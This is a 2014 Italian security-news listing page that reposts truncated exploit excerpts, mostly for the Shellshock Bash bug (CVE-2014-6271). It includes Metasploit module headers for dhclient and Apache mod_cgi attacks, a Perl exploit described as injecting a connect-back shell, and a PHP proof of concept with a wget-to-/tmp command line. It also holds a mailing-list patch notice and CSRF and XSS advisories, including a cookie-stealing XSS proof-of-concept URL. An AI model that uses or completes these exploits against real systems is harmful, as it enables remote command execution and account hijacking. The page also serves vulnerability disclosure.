DHCP Client Bash Environment Variable Code Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/dhcp'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize
    super(
      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
      'Description'    => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting dhclient network configuration
        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
      },
      'Author'      =>
        [
          'scriptjunkie',...

Leggi il seguito »

Apache mod_cgi Bash Environment Variable Code Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane...

Leggi il seguito »

Gnu Bash 4.3 CGI Scan Remote Command Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
 
# http connection
import urllib2
# Args management
import optparse
# Error managemen
import sys
 
banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  | ...

Leggi il seguito »

bashedCgi Remote Command Execution

29 settembre 2014 - Fonte: http://www.mondounix.com
    require 'msf/core'
 
    class Metasploit3 < Msf::Auxiliary
 
        include Msf::Exploit::Remote::HttpClient
 
 
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => [ 'Stephane Chazelas' ], # vuln discovery 
     'Author'   => [ 'Shaun Colley <scolley at ioactive.com>' ], # metasploit module 
                'License'        => MSF_LICENSE,
...

Leggi il seguito »

Gnu Bash 4.3 CGI REFERER Command Injection

26 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.  
# Injects a Perl connect back shell. 
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on:
# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu)
#
#...

Leggi il seguito »

Bash Code Injection Proof Of Concept

26 settembre 2014 - Fonte: http://www.mondounix.com
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
     GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
     Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
 
Test CGI Code : #!/bin/bash
...

Leggi il seguito »

Bash Environment Variable Command Execution

26 settembre 2014 - Fonte: http://www.mondounix.com
Date: Wed, 24 Sep 2014 17:03:19 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2014-6271: remote code execution through bash
 
* Florian Weimer:
 
> Chet Ramey, the GNU bash upstream maintainer, will soon release
> official upstream patches.
 
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025
 
Someone...

Leggi il seguito »

M/Monit 3.2.2 Cross Site Request Forgery

20 settembre 2014 - Fonte: http://www.mondounix.com
Application: M/Monit 3.2.2
Author: Dolev Farhi @dolevff
Date: 13.9.2014
Relevant CVEs: CVE-2014-6409, CVE-2014-6607
Vulnerable version: <= 3.2.2
 
 
 
M/Monit is an Easy, proactive monitoring of Unix systems, network and 
cloud services.
 
1. Vulnerability Description:
Account hijack via cross-site request forgery (CVE-2014-6409, 
CVE-2014-6607)
It was found that M/Monit latest version is vulnerable to CSRF attacks. 
it is possible to reset the password of any user account (admin/user)
on the system without needing to know the current password of the 
attacked account, due to missing password change verification mechanism.
2. Proof of concept
<html> <div align="center"> <pre>...

Leggi il seguito »

WordPress WooCommerce Reflected XSS

19 settembre 2014 - Fonte: http://www.mondounix.com
Details
================
Software: WooCommerce - excelling eCommerce
Version: 2.1.12
Homepage: http://wordpress.org/plugins/woocommerce/
Advisory report: 
https://security.dxw.com/advisories/reflected-xss-in-woocommerce-excelling-ecommerce-allows-attackers-ability-to-do-almost-anything-an-admin-user-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
 
Description
================
Reflected XSS in WooCommerce – excelling eCommerce allows attackers ability to do almost anything an admin user can do
 
Vulnerability
================
An attacker able to convince a logged-in admin user to visit a link of their choosing (for instance via spearphishing) 
can execute arbitrary JavaScript within...

Leggi il seguito »

WatchGuard XTM 11.8.3 Reflected XSS (CVE-2014-6413)

19 settembre 2014 - Fonte: http://www.mondounix.com
I. VULNERABILITY
 
Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8.3
 
II. BACKGROUND
-------------------------
WatchGuard builds affordable, all-in-one network and content security
solutions to provide defense in depth for corporate content, networks
and the businesses they power.
 
III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in XTM WatchGuard.
The code injection is done through the parameter "poll_name" in the
page “/firewall/policy?pol_name=(HERE XSS)”
 
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “poll_name” correctly.
https://10.200.210.100:8080/network/dynamic_dns_config?intf=aaaa<scrip
t>alert(document.cookie)</script>
 
V....

Leggi il seguito »